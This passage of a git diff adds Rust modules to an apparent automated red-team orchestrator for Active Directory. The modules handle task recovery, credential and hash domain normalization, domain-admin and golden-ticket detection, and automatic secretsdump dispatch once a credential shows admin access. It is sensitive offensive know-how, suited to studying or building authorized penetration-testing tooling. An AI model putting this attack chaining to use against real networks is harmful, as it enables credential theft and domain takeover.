last_activity_at: chrono::Utc::now(), + params: HashMap::new(), + result: None, + error: None, + retry_count: 2, + max_retries: 3, + }; + // retry_count (2) after increment (3) should still be <= max_retries (3) + assert!( + task.retry_count < task.max_retries, + "Task with retry_count=2 should still be requeueable" + ); + } + + #[test] + fn test_retry_limit_exceeded() { + let task = TaskInfo { + task_id: "test_2".to_string(), + task_type: "recon".to_string(), + assigned_agent: "recon".to_string(), + status: TaskStatus::InProgress, + created_at: chrono::Utc::now(), + started_at: None, + completed_at: None, + last_activity_at: chrono::Utc::now(), + params: HashMap::new(), + result: None, + error: None, + retry_count: 3, + max_retries: 3, + }; + // After increment: retry_count=4 > max_retries=3 + assert!( + task.retry_count + 1 > task.max_retries, + "Task with retry_count=3 after increment should exceed max" + ); + } + + // --- State normalization tests --- + + #[test] + fn test_normalize_credential_domains_netbios_to_fqdn() { + let mut creds = vec![ + Credential { + id: "1".to_string(), + username: "admin".to_string(), + password: "pass".to_string(), // pragma: allowlist secret + domain: "CONTOSO".to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }, + Credential { + id: "2".to_string(), + username: "user1".to_string(), + password: "pass2".to_string(), // pragma: allowlist secret + domain: "contoso.local".to_string(), // already FQDN + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }, + ]; + + let mut netbios_map = HashMap::new(); + netbios_map.insert("CONTOSO".to_string(), "contoso.local".to_string()); + + let fixed = normalize_credential_domains(&mut creds, &netbios_map); + assert_eq!(fixed, 1); + assert_eq!(creds[0].domain, "contoso.local"); + assert_eq!(creds[1].domain, "contoso.local"); // unchanged + } + + #[test] + fn 
test_normalize_hash_domains() { + let mut hashes = vec![make_hash("admin", "FABRIKAM", "NTLM", "hash123")]; + + let mut netbios_map = HashMap::new(); + netbios_map.insert("FABRIKAM".to_string(), "fabrikam.local".to_string()); + + let fixed = normalize_hash_domains(&mut hashes, &netbios_map); + assert_eq!(fixed, 1); + assert_eq!(hashes[0].domain, "fabrikam.local"); + } + + #[test] + fn test_normalize_no_changes_when_fqdn() { + let mut creds = vec![Credential { + id: "1".to_string(), + username: "admin".to_string(), + password: "pass".to_string(), // pragma: allowlist secret + domain: "contoso.local".to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }]; + + let netbios_map = HashMap::new(); + let fixed = normalize_credential_domains(&mut creds, &netbios_map); + assert_eq!(fixed, 0, "FQDN domain should not be touched"); + } + + #[test] + fn test_resolve_domain_empty_and_dotted() { + let map = HashMap::new(); + assert!(resolve_domain("", &map).is_none(), "Empty domain -> None"); + assert!( + resolve_domain("already.fqdn.local", &map).is_none(), + "Dotted domain -> None" + ); + } + + #[test] + fn test_resolve_domain_case_insensitive_lookup() { + let mut map = HashMap::new(); + map.insert("CONTOSO".to_string(), "contoso.local".to_string()); + + assert_eq!( + resolve_domain("contoso", &map), + Some("contoso.local".to_string()), + "Lowercase input should match uppercase key via to_uppercase" + ); + assert_eq!( + resolve_domain("CONTOSO", &map), + Some("contoso.local".to_string()), + ); + assert_eq!( + resolve_domain("Contoso", &map), + Some("contoso.local".to_string()), + ); + } + + // --- Kerberoast SPN extraction --- + + #[test] + fn test_extract_kerberoast_spn_key_valid() { + let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$chk$enc"; + let result = extract_kerberoast_spn_key(hash); + assert_eq!(result, Some("23:MSSQLSvc/db01.contoso.local".to_string())); + } + + #[test] + fn test_extract_kerberoast_spn_key_invalid() { + assert!(extract_kerberoast_spn_key("not_a_krb_hash").is_none()); + assert!(extract_kerberoast_spn_key("$krb5tgs$").is_none()); + assert!(extract_kerberoast_spn_key("$krb5tgs$23$nope").is_none()); + } + + // --- Connection error detection --- + + #[test] + fn test_is_connection_error() { + let conn_err = anyhow::anyhow!("Connection reset by peer"); + assert!(is_connection_error(&conn_err)); + + let timeout_err = anyhow::anyhow!("Operation TIMEOUT after 30s"); + assert!(is_connection_error(&timeout_err)); + + let broken = anyhow::anyhow!("Broken pipe"); + assert!(is_connection_error(&broken)); + + let normal = anyhow::anyhow!("Key not found"); + assert!(!is_connection_error(&normal)); + } +} diff --git a/ares-cli/src/orchestrator/recovery/normalize.rs b/ares-cli/src/orchestrator/recovery/normalize.rs new file mode 100644 index 00000000..5271bfa3 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/normalize.rs @@ -0,0 +1,171 @@ +//! State normalization: fix NetBIOS -> FQDN domain mismatches. + +use std::collections::HashMap; + +use ares_core::models::{Credential, Hash}; + +/// If `domain` is a NetBIOS name (no dots, uppercase-ish), look it up in the +/// map and return the FQDN if found. Returns `None` if no fixup is needed. 
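+///
+/// Example (mapping illustrative): with `{"CORP" => "corp.example.com"}`,
+/// `resolve_domain("corp", &map)` yields `Some("corp.example.com")`, while
+/// `resolve_domain("corp.example.com", &map)` yields `None`.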
+pub fn resolve_domain(domain: &str, netbios_map: &HashMap<String, String>) -> Option<String> {
+    let trimmed = domain.trim();
+    if trimmed.is_empty() || trimmed.contains('.') {
+        // Already FQDN or empty
+        return None;
+    }
+    // Look up the NetBIOS name (case-insensitive)
+    let upper = trimmed.to_uppercase();
+    netbios_map
+        .get(&upper)
+        .or_else(|| netbios_map.get(trimmed))
+        .or_else(|| netbios_map.get(&trimmed.to_lowercase()))
+        .cloned()
+}
+
+/// Generic domain normalizer: applies `resolve_domain` to each item's domain,
+/// mutating in place via the provided accessor. Returns the count of items fixed.
+fn normalize_domains<T, F>(
+    items: &mut [T],
+    netbios_map: &HashMap<String, String>,
+    get_domain: F,
+) -> usize
+where
+    F: Fn(&mut T) -> &mut String,
+{
+    let mut fixed = 0;
+    for item in items.iter_mut() {
+        let domain = get_domain(item);
+        if let Some(fqdn) = resolve_domain(domain, netbios_map) {
+            *domain = fqdn;
+            fixed += 1;
+        }
+    }
+    fixed
+}
+
+/// Fix credential domains: replace NetBIOS names with FQDNs where the
+/// `netbios_to_fqdn` map provides a mapping.
+///
+/// Returns the number of credentials fixed.
+pub fn normalize_credential_domains(
+    credentials: &mut [Credential],
+    netbios_map: &HashMap<String, String>,
+) -> usize {
+    normalize_domains(credentials, netbios_map, |c| &mut c.domain)
+}
+
+/// Fix hash domains: replace NetBIOS names with FQDNs where the
+/// `netbios_to_fqdn` map provides a mapping.
+///
+/// Returns the number of hashes fixed.
+pub fn normalize_hash_domains(hashes: &mut [Hash], netbios_map: &HashMap<String, String>) -> usize {
+    normalize_domains(hashes, netbios_map, |h| &mut h.domain)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn make_map() -> HashMap<String, String> {
+        let mut m = HashMap::new();
+        m.insert("CONTOSO".to_string(), "contoso.local".to_string());
+        m.insert("FABRIKAM".to_string(), "fabrikam.local".to_string());
+        m
+    }
+
+    #[test]
+    fn test_resolve_domain_netbios_to_fqdn() {
+        let map = make_map();
+        assert_eq!(
+            resolve_domain("CONTOSO", &map),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn test_resolve_domain_case_insensitive() {
+        let map = make_map();
+        assert_eq!(
+            resolve_domain("contoso", &map),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn test_resolve_domain_already_fqdn() {
+        let map = make_map();
+        assert_eq!(resolve_domain("contoso.local", &map), None);
+    }
+
+    #[test]
+    fn test_resolve_domain_empty() {
+        let map = make_map();
+        assert_eq!(resolve_domain("", &map), None);
+    }
+
+    #[test]
+    fn test_resolve_domain_unknown_netbios() {
+        let map = make_map();
+        assert_eq!(resolve_domain("UNKNOWN", &map), None);
+    }
+
+    #[test]
+    fn test_normalize_credential_domains() {
+        let map = make_map();
+        let mut creds = vec![
+            Credential {
+                id: String::new(),
+                username: "admin".to_string(),
+                password: "P@ss1".to_string(),
+                domain: "CONTOSO".to_string(),
+                source: String::new(),
+                discovered_at: None,
+                is_admin: false,
+                parent_id: None,
+                attack_step: 0,
+            },
+            Credential {
+                id: String::new(),
+                username: "jdoe".to_string(),
+                password: "P@ss2".to_string(),
+                domain: "contoso.local".to_string(),
+                source: String::new(),
+                discovered_at: None,
+                is_admin: false,
+                parent_id: None,
+                attack_step: 0,
+            },
+        ];
+        let fixed = normalize_credential_domains(&mut creds, &map);
+        assert_eq!(fixed, 1);
+        assert_eq!(creds[0].domain, "contoso.local");
+        assert_eq!(creds[1].domain, "contoso.local"); // unchanged
+    }
+
+    #[test]
+    fn test_normalize_hash_domains() {
+        let map = make_map();
+        let mut hashes = vec![Hash {
+            id: String::new(),
+            username: "admin".to_string(),
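+            // Placeholder value below -- not a real NTLM hash.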
hash_value: "aabbccdd".to_string(), + hash_type: "ntlm".to_string(), + domain: "FABRIKAM".to_string(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }]; + let fixed = normalize_hash_domains(&mut hashes, &map); + assert_eq!(fixed, 1); + assert_eq!(hashes[0].domain, "fabrikam.local"); + } + + #[test] + fn test_normalize_empty_slice() { + let map = make_map(); + let mut creds: Vec = vec![]; + assert_eq!(normalize_credential_domains(&mut creds, &map), 0); + } +} diff --git a/ares-cli/src/orchestrator/recovery/requeue.rs b/ares-cli/src/orchestrator/recovery/requeue.rs new file mode 100644 index 00000000..f26baf56 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/requeue.rs @@ -0,0 +1,59 @@ +//! Task requeuing (preserves original task_id). + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tracing::info; + +use ares_core::models::TaskInfo; + +use crate::orchestrator::task_queue::{ + TaskMessage, TaskQueue, RESULT_QUEUE_PREFIX, TASK_QUEUE_PREFIX, +}; + +/// Requeue a task to its target role queue, preserving the original task_id. +/// +/// Uses RPUSH so retried tasks are consumed before new ones (workers BRPOP +/// from the right). +pub async fn requeue_task(queue: &TaskQueue, task_id: &str, task: &TaskInfo) -> Result<()> { + let mut payload = task + .params + .iter() + .map(|(k, v)| (k.clone(), v.clone())) + .collect::>(); + + // Add retry metadata + payload.insert( + "_retry_count".to_string(), + serde_json::Value::from(task.retry_count), + ); + payload.insert("_is_retry".to_string(), serde_json::Value::Bool(true)); + + let callback_queue = format!("{RESULT_QUEUE_PREFIX}:{task_id}"); + let msg = TaskMessage { + task_id: task_id.to_string(), + task_type: task.task_type.clone(), + source_agent: "orchestrator".to_string(), + target_agent: task.assigned_agent.clone(), + payload: serde_json::Value::Object(payload), + priority: 1, // High priority for retries + created_at: Some(chrono::Utc::now()), + callback_queue: Some(callback_queue), + }; + + let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", task.assigned_agent); + let json = serde_json::to_string(&msg).context("Failed to serialize requeue TaskMessage")?; + + let mut conn = queue.connection(); + conn.rpush::<_, _, ()>(&queue_key, &json) + .await + .with_context(|| format!("RPUSH to {} for requeue", queue_key))?; + + info!( + task_id = %task_id, + queue = %queue_key, + retry_count = task.retry_count, + "Requeued task (RPUSH)" + ); + + Ok(()) +} diff --git a/ares-cli/src/orchestrator/recovery/resume_helper.rs b/ares-cli/src/orchestrator/recovery/resume_helper.rs new file mode 100644 index 00000000..1f5a73f4 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/resume_helper.rs @@ -0,0 +1,165 @@ +//! Post-recovery analysis helper. + +use std::collections::HashMap; +use std::fmt::Write as _; + +use ares_core::models::{Hash, SharedRedTeamState, TaskInfo, VulnerabilityInfo}; + +use super::types::{InterruptedTask, RetryingTask}; + +/// Post-recovery analysis helper. +/// +/// Provides convenience methods to inspect the recovered state and produce +/// a human-readable summary for the orchestrator. +#[allow(dead_code)] +pub struct OperationResumeHelper<'a> { + pub state: &'a SharedRedTeamState, + pub requeued_task_ids: &'a [String], + pub failed_task_ids: &'a [String], + /// Pending tasks loaded during recovery (task_id -> TaskInfo). 
+ pub pending_tasks: &'a HashMap, +} + +#[allow(dead_code)] +impl<'a> OperationResumeHelper<'a> { + /// Get tasks that permanently failed (exceeded max retries during recovery). + pub fn get_interrupted_tasks(&self) -> Vec { + let mut out = Vec::new(); + for task_id in self.failed_task_ids { + if let Some(task) = self.pending_tasks.get(task_id) { + out.push(InterruptedTask { + task_id: task_id.clone(), + task_type: task.task_type.clone(), + assigned_agent: task.assigned_agent.clone(), + retry_count: task.retry_count, + error: task.error.clone().unwrap_or_default(), + }); + } + } + out + } + + /// Get tasks that were auto-requeued and are currently retrying. + pub fn get_retrying_tasks(&self) -> Vec { + let mut out = Vec::new(); + for task_id in self.requeued_task_ids { + if let Some(task) = self.pending_tasks.get(task_id) { + out.push(RetryingTask { + task_id: task_id.clone(), + task_type: task.task_type.clone(), + assigned_agent: task.assigned_agent.clone(), + retry_count: task.retry_count, + max_retries: task.max_retries, + }); + } + } + out + } + + /// Get vulnerabilities that have been discovered but not yet exploited. + pub fn get_unexploited_vulnerabilities(&self) -> Vec<&VulnerabilityInfo> { + let mut vulns: Vec<&VulnerabilityInfo> = self + .state + .discovered_vulnerabilities + .values() + .filter(|v| !self.state.exploited_vulnerabilities.contains(&v.vuln_id)) + .collect(); + vulns.sort_by_key(|v| v.priority); + vulns + } + + /// Get hashes that have not been cracked yet. + pub fn get_uncracked_hashes(&self) -> Vec<&Hash> { + self.state + .all_hashes + .iter() + .filter(|h| h.cracked_password.is_none()) + .collect() + } + + /// Generate a human-readable summary of the recovery state. + pub fn get_resume_summary(&self) -> String { + let mut s = String::new(); + + let _ = writeln!(s, "OPERATION RESUMED AFTER RECOVERY"); + let _ = writeln!(s, "{}", "=".repeat(50)); + let _ = writeln!(s); + let _ = writeln!(s, "Operation ID: {}", self.state.operation_id); + let _ = writeln!(s, "Credentials found: {}", self.state.all_credentials.len()); + let _ = writeln!(s, "Hosts discovered: {}", self.state.all_hosts.len()); + let _ = writeln!( + s, + "Domain admin: {}", + if self.state.has_domain_admin { + "YES" + } else { + "NO" + } + ); + let _ = writeln!(s); + + // Retrying tasks + let retrying = self.get_retrying_tasks(); + if !retrying.is_empty() { + let _ = writeln!(s, "[RETRYING] {} tasks auto-requeued:", retrying.len()); + for task in retrying.iter().take(5) { + let _ = writeln!( + s, + " - {} -> {} (retry {}/{})", + task.task_type, task.assigned_agent, task.retry_count, task.max_retries + ); + } + let _ = writeln!(s); + } + + // Permanently failed tasks + let interrupted = self.get_interrupted_tasks(); + if !interrupted.is_empty() { + let _ = writeln!( + s, + "[FAILED] {} tasks exceeded max retries:", + interrupted.len() + ); + for task in interrupted.iter().take(5) { + let _ = writeln!( + s, + " - {} -> {} (retried {}x)", + task.task_type, task.assigned_agent, task.retry_count + ); + } + let _ = writeln!(s); + } + + // Unexploited vulnerabilities + let unexploited = self.get_unexploited_vulnerabilities(); + if !unexploited.is_empty() { + let _ = writeln!( + s, + "[PENDING] {} unexploited vulnerabilities:", + unexploited.len() + ); + for v in unexploited.iter().take(5) { + let _ = writeln!( + s, + " - {}: {} (priority {})", + v.vuln_type, v.target, v.priority + ); + } + let _ = writeln!(s); + } + + // Uncracked hashes + let uncracked = self.get_uncracked_hashes(); + if !uncracked.is_empty() 
{ + let _ = writeln!(s, "[PENDING] {} uncracked hashes", uncracked.len()); + let _ = writeln!(s); + } + + if retrying.is_empty() && interrupted.is_empty() { + let _ = writeln!(s, "[OK] No interrupted tasks - clean recovery"); + let _ = writeln!(s); + } + + s + } +} diff --git a/ares-cli/src/orchestrator/recovery/types.rs b/ares-cli/src/orchestrator/recovery/types.rs new file mode 100644 index 00000000..cc68ebce --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/types.rs @@ -0,0 +1,127 @@ +//! Types and constants for operation recovery. + +use ares_core::models::{SharedRedTeamState, TaskStatus}; + +/// Maximum number of retries before a task is considered permanently failed. +pub const MAX_RETRIES: i32 = 3; + +/// Statuses that indicate an interrupted task eligible for re-enqueue. +pub const INTERRUPTED_STATUSES: &[TaskStatus] = &[ + TaskStatus::Pending, + TaskStatus::InProgress, + TaskStatus::Retrying, +]; + +/// Keywords that signal a transient Redis connection error. +pub const CONNECTION_ERROR_KEYWORDS: &[&str] = &[ + "connection", + "connect", + "closed", + "timeout", + "broken pipe", + "reset", + "reading from", +]; + +/// Maximum number of retry attempts for transient Redis connection errors. +pub const MAX_CONNECTION_RETRIES: u32 = 3; + +/// Check if an error looks like a transient Redis connection failure. +pub fn is_connection_error(err: &anyhow::Error) -> bool { + let msg = err.to_string().to_lowercase(); + CONNECTION_ERROR_KEYWORDS.iter().any(|kw| msg.contains(kw)) +} + +/// Result of a recovery operation. +#[derive(Debug)] +#[allow(dead_code)] +pub struct RecoveredState { + /// The full shared state loaded from Redis. + pub state: SharedRedTeamState, + /// Task IDs that were re-enqueued for retry. + pub requeued_task_ids: Vec, + /// Task IDs that exceeded max retries and were marked failed. + pub failed_task_ids: Vec, +} + +/// Info about a permanently failed task (exceeded max retries). +#[derive(Debug, Clone)] +#[allow(dead_code)] +pub struct InterruptedTask { + pub task_id: String, + pub task_type: String, + pub assigned_agent: String, + pub retry_count: i32, + pub error: String, +} + +/// Info about a task that was auto-requeued for retry. 
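+/// Rendered in the recovery summary as "retry {retry_count}/{max_retries}".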
+#[derive(Debug, Clone)] +#[allow(dead_code)] +pub struct RetryingTask { + pub task_id: String, + pub task_type: String, + pub assigned_agent: String, + pub retry_count: i32, + pub max_retries: i32, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_is_connection_error_connection() { + let err = anyhow::anyhow!("Redis connection refused"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_timeout() { + let err = anyhow::anyhow!("Operation timeout after 30s"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_broken_pipe() { + let err = anyhow::anyhow!("Broken pipe while writing"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_reset() { + let err = anyhow::anyhow!("Connection reset by peer"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_closed() { + let err = anyhow::anyhow!("Socket closed unexpectedly"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_connection_error_case_insensitive() { + let err = anyhow::anyhow!("TIMEOUT waiting for response"); + assert!(is_connection_error(&err)); + } + + #[test] + fn test_is_not_connection_error() { + let err = anyhow::anyhow!("Key not found in Redis"); + assert!(!is_connection_error(&err)); + } + + #[test] + fn test_is_not_connection_error_parse() { + let err = anyhow::anyhow!("Failed to parse JSON response"); + assert!(!is_connection_error(&err)); + } + + #[test] + fn test_constants() { + assert_eq!(MAX_RETRIES, 3); + assert_eq!(MAX_CONNECTION_RETRIES, 3); + assert_eq!(INTERRUPTED_STATUSES.len(), 3); + } +} diff --git a/ares-cli/src/orchestrator/result_processing/admin_checks.rs b/ares-cli/src/orchestrator/result_processing/admin_checks.rs new file mode 100644 index 00000000..9cf3b66b --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/admin_checks.rs @@ -0,0 +1,328 @@ +//! Domain admin indicator checks, golden ticket detection, Pwn3d! credential +//! upgrades, and domain SID extraction. + +use std::sync::Arc; + +use serde_json::Value; +use tracing::{info, warn}; + +use super::parsing::has_domain_admin_indicator; +use crate::orchestrator::dispatcher::Dispatcher; + +/// Check result for domain admin indicators and update state. 
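+///
+/// A payload counts as an indicator when it either carries an explicit
+/// `has_domain_admin: true` flag or lists a `krbtgt` hash (see
+/// `has_domain_admin_indicator` in `parsing.rs`).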
+pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: &Arc<Dispatcher>) { + if !has_domain_admin_indicator(payload) { + return; + } + let already_da = { + let state = dispatcher.state.read().await; + state.has_domain_admin + }; + let path = if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { + payload + .get("domain_admin_path") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + } else { + Some("secretsdump -> krbtgt hash".to_string()) + }; + if let Err(e) = dispatcher + .state + .set_domain_admin(&dispatcher.queue, path.clone()) + .await + { + warn!(err = %e, "Failed to set domain admin flag"); + } else { + info!("Domain Admin achieved!"); + } + if !already_da { + let (domain, dc_target) = { + let state = dispatcher.state.read().await; + let domain = state.domains.first().cloned().unwrap_or_default(); + let dc = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned() + .unwrap_or_else(|| domain.clone()); + (domain, dc) + }; + if !domain.is_empty() { + let vuln_id = format!("domain_admin_{}", domain.to_lowercase()); + let mut details = std::collections::HashMap::new(); + details.insert("domain".into(), serde_json::Value::String(domain.clone())); + if let Some(ref p) = path { + details.insert("path".into(), serde_json::Value::String(p.clone())); + } + details.insert( + "note".into(), + serde_json::Value::String( + "Domain admin achieved via agent-reported indicator".to_string(), + ), + ); + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "domain_admin".to_string(), + target: dc_target, + discovered_by: "result_processing".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + let _ = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await; + } + } +} + +pub(crate) async fn check_golden_ticket_completion( + payload: &Value, + task_id: &str, + dispatcher: &Arc<Dispatcher>, +) { + if !task_id.contains("exploit") && !task_id.contains("golden") { + return; + } + { + let state = dispatcher.state.read().await; + if state.has_golden_ticket { + return; + } + } + let mut found_ticket = false; + let mut domain = String::new(); + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + let text = item + .as_str() + .or_else(|| item.get("output").and_then(|v| v.as_str())) + .unwrap_or(""); + if text.contains("Saving ticket in") && text.contains(".ccache") { + found_ticket = true; + break; + } + } + } + if !found_ticket { + for key in &["tool_output", "output", "summary"] { + if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { + if text.contains("Saving ticket in") && text.contains(".ccache") { + found_ticket = true; + break; + } + } + } + } + if !found_ticket && payload.get("has_golden_ticket").and_then(|v| v.as_bool()) == Some(true) { + found_ticket = true; + } + if !found_ticket { + return; + } + if let Some(d) = payload.get("domain").and_then(|v| v.as_str()) { + domain = d.to_string(); + } + if domain.is_empty() { + let state = dispatcher.state.read().await; + domain = state.domains.first().cloned().unwrap_or_default(); + } + if let Err(e) = dispatcher + .state + .set_golden_ticket(&dispatcher.queue, &domain) + .await + { + warn!(err = %e, "Failed to set golden ticket flag"); + } +} + +pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc<Dispatcher>) { + for line in
text.lines() { + if !line.contains("Pwn3d!") || !line.contains("[+]") { + continue; + } + if let Some(after_plus) = line.split("[+]").nth(1) { + let after_plus = after_plus.trim(); + if let Some(backslash) = after_plus.find('\\') { + let domain_part = after_plus[..backslash].trim(); + let rest = &after_plus[backslash + 1..]; + let username = if let Some(colon) = rest.find(':') { + &rest[..colon] + } else { + rest.split_whitespace().next().unwrap_or("") + }; + let username = username.trim(); + let domain = domain_part.to_lowercase(); + if username.is_empty() || domain.is_empty() { + continue; + } + info!(username = %username, domain = %domain, "Pwn3d! detected -- upgrading credential to admin"); + let upgraded = { + let mut state = dispatcher.state.write().await; + let mut found = false; + for cred in state.credentials.iter_mut() { + if cred.username.to_lowercase() == username.to_lowercase() + && cred.domain.to_lowercase() == domain + && !cred.is_admin + { + cred.is_admin = true; + found = true; + } + } + found + }; + if upgraded { + let pwned_ip = line + .split_whitespace() + .find(|w| { + w.split('.').count() == 4 + && w.split('.').all(|o| o.parse::<u8>().is_ok()) + }) + .map(|s| s.to_string()); + info!( + username = %username, + domain = %domain, + pwned_host = ?pwned_ip, + "Credential upgraded to admin -- dispatching priority secretsdump" + ); + let work: Vec<(String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + let dc_ips: Vec<String> = + state.domain_controllers.values().cloned().collect(); + let mut targets: Vec<String> = dc_ips; + if let Some(ref ip) = pwned_ip { + if !targets.contains(ip) { + targets.push(ip.clone()); + } + } + state + .credentials + .iter() + .filter(|c| { + c.username.to_lowercase() == username.to_lowercase() + && c.domain.to_lowercase() == domain + && c.is_admin + }) + .flat_map(|cred| { + targets + .iter() + .map(|ip| (ip.clone(), cred.clone())) + .collect::<Vec<_>>() + }) + .collect() + }; + for (target_ip, cred) in work { + match dispatcher.request_secretsdump(&target_ip, &cred, 1).await { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %target_ip, + username = %username, + "Admin Pwn3d! secretsdump dispatched (priority 1)" + ); + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch Pwn3d!
secretsdump"), + } + } + } + } + } + } +} + +pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &Arc<Dispatcher>) { + let mut text_parts: Vec<&str> = Vec::new(); + for key in &["tool_output", "output"] { + if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + text_parts.push(s); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + } + if text_parts.is_empty() { + return; + } + let combined = text_parts.join("\n"); + if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { + let domain = payload + .get("domain") + .and_then(|v| v.as_str()) + .map(|d| d.to_lowercase()) + .filter(|d| !d.is_empty()); + let domain = match domain { + Some(d) => d, + None => { + let state = dispatcher.state.read().await; + match state.domains.first() { + Some(d) => d.to_lowercase(), + None => return, + } + } + }; + let already_cached = { + let state = dispatcher.state.read().await; + state + .domain_sids + .get(&domain) + .map(|s| s == &sid) + .unwrap_or(false) + }; + if !already_cached { + let op_id = { + let state = dispatcher.state.read().await; + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { + warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + } else { + info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + dispatcher + .state + .write() + .await + .domain_sids + .insert(domain.clone(), sid); + } + } + if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { + let already_known = { + let state = dispatcher.state.read().await; + state.admin_names.contains_key(&domain) + }; + if !already_known { + let op_id = { + let state = dispatcher.state.read().await; + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { + warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); + } else { + info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); + dispatcher + .state + .write() + .await + .admin_names + .insert(domain, admin_name); + } + } + } + } +} diff --git a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs new file mode 100644 index 00000000..54502782 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs @@ -0,0 +1,190 @@ +//! Background discovery polling. + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use redis::AsyncCommands; +use serde_json::Value; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; + +use super::parsing::resolve_parent_id; +use super::LOCKOUT_PATTERNS; +use crate::orchestrator::dispatcher::Dispatcher; + +pub async fn discovery_poller(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(5)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + if let Err(e) = poll_discoveries(&dispatcher).await { + debug!(err = %e, "Discovery poll error"); + } + } +} + +async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { + let key = dispatcher.state.discovery_key().await; + let mut conn = dispatcher.queue.connection(); + let discoveries: Vec<String> = conn.lrange(&key, 0, -1).await.unwrap_or_default(); + if discoveries.is_empty() { + return Ok(()); + } + let _: () = conn.del(&key).await?; + info!( + count = discoveries.len(), + "Processing real-time discoveries" + ); + for json_str in &discoveries { + let discovery: Value = match serde_json::from_str(json_str) { + Ok(v) => v, + Err(e) => { + warn!(err = %e, "Bad discovery JSON"); + continue; + } + }; + let disc_type = discovery + .get("type") + .and_then(|v| v.as_str()) + .unwrap_or("unknown"); + let data = match discovery.get("data") { + Some(d) => d, + None => continue, + }; + let input_username = discovery.get("input_username").and_then(|v| v.as_str()); + let input_domain = discovery.get("input_domain").and_then(|v| v.as_str()); + match disc_type { + "credential" => match serde_json::from_value::<Credential>(data.clone()) { + Ok(mut cred) => { + if cred.parent_id.is_none() { + let state = dispatcher.state.read().await; + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &cred.source, + &cred.username, + &cred.domain, + input_username, + input_domain, + ); + cred.parent_id = pid; + cred.attack_step = step; + drop(state); + } + let user_domain = format!("{}@{}", cred.username, cred.domain); + match dispatcher + .state + .publish_credential(&dispatcher.queue, cred) + .await + { + Ok(true) => { + info!(credential = %user_domain, "Discovery: credential published") + } + Ok(false) => { + debug!(credential = %user_domain, "Discovery: credential already known") + } + Err(e) => { + warn!(err = %e, credential = %user_domain, "Failed to publish discovered credential") + } + } + } + Err(e) => warn!(err = %e, "Failed to deserialize credential discovery"), + }, + "hash" => { + if let Ok(mut hash) = serde_json::from_value::<Hash>(data.clone()) { + if hash.parent_id.is_none() { + let state = dispatcher.state.read().await; + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &hash.source, + &hash.username, + &hash.domain, + input_username, + input_domain, + ); + hash.parent_id = pid; + 